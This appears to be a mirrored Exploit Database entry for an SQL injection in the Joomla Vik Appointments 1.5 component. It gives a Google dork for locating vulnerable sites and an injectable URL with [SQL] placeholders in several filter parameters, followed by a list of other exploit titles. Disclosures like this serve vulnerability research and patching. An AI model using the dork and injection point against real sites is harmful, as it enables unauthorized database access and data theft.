Joomla! Component Vik Appointments 1.5 – SQL Injection

Exploit Database
15 阅读

作者： Ihsan Sencan

日期： 2017-03-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/41602/

# # # # #
# Exploit Title: Joomla! Component Vik Appointments v1.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_vikappointments
# Date: 15.03.2017
# Vendor Homepage: https://extensionsforjoomla.com/
# Software : https://extensionsforjoomla.com/livedemo/vikappointments/
# Demo: https://extensionsforjoomla.com/livedemo/vikappointments/
# Version: 1.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/en/our-staff?view=employeeslist&ordering=6&filters[group]=[SQL]&filters[service]=[SQL]&filters[country]=[SQL]&filters[state]=[SQL]
# ext4joo_vikappointmentsj3demo
# Etc..
# # # # #

last Exploits
Joomla! Component Vik Appointments 1.5 – SQL Injection的更多信息

Dew-NewPHPLinks 2.1b – ‘index.php’ SQL Injection：
MaxForum 1.0.0 – Local File Inclusion：
Silurus Classifieds Script 2.0 – ‘wcategory’ SQL Injection：
Aigaion 1.3.4 – ‘ID’ SQL Injection：
mooSocial Store Plugin 2.6 – SQL Injection：
Joomla! Component com_newssearch – SQL Injection：
Adobe ColdFusion 2018 – Arbitrary File Upload：
Zen Tracking 2.2 – Authentication Bypass：